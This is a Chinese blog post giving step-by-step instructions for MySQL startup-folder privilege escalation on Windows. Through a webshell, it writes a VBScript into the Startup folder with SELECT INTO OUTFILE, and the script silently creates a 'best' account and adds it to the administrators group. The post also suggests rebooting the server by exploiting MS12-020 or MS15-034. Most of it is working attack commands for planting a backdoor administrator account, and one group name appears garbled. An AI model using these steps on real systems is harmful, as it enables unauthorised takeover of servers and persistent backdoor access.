在第一篇:https://www.cnblogs.com/zhaoyunxiang/p/15357057.html,描述了MySQL的UDF提权,在第二篇:https://www.cnblogs.com/zhaoyunxiang/p/15357630.html,描述了MySQL的MOF提权,最后一篇,说一下MySQL数据库的启动提权,
这种提权的核心条件是当前是管理员身份,webshell也是管理员身份,不然是提权不成功的,普通用户不能来写MySQL启动项来提权,
它的实现途径是,首先使用mysql语句写一个vbs脚本,再通过webshell的MySQL写入启动项,最后配合漏洞(MS12-020、MS15-034)重启服务器,以达到提权
1.通过菜刀工具,创建一个test数据库
2.打开test数据库
3.创建一个数据表,名为a,字段为cmd text;
4.向数据表中插入数值:insert into a values("set wshshell=createobject(""wscript.shell"")");
5.继续向表中插入数值对:insert into a values("a=wshshell.run(""cmd.exe /c net user best best /add"",0)");这条语句旨在以隐藏的方式创建一个best用户
6.继续向表中插入数值对:insert into a values("b=wshshell.run(""cmd.exe /c net localgroup Administrator best /add"",0)");这条语句旨在将用户添加在管理员组
7.查看创建的a数据表:select * from a;
8.关键一步,将数据库best用户导入到启动项:select * from a into outfile "C://docume~1//administrator// [开始] 菜单//程序//启动//best.vbs";
添加完之后,开机运行之后,会自行添加一个best账户,通过此账户,可以进行数据库操作,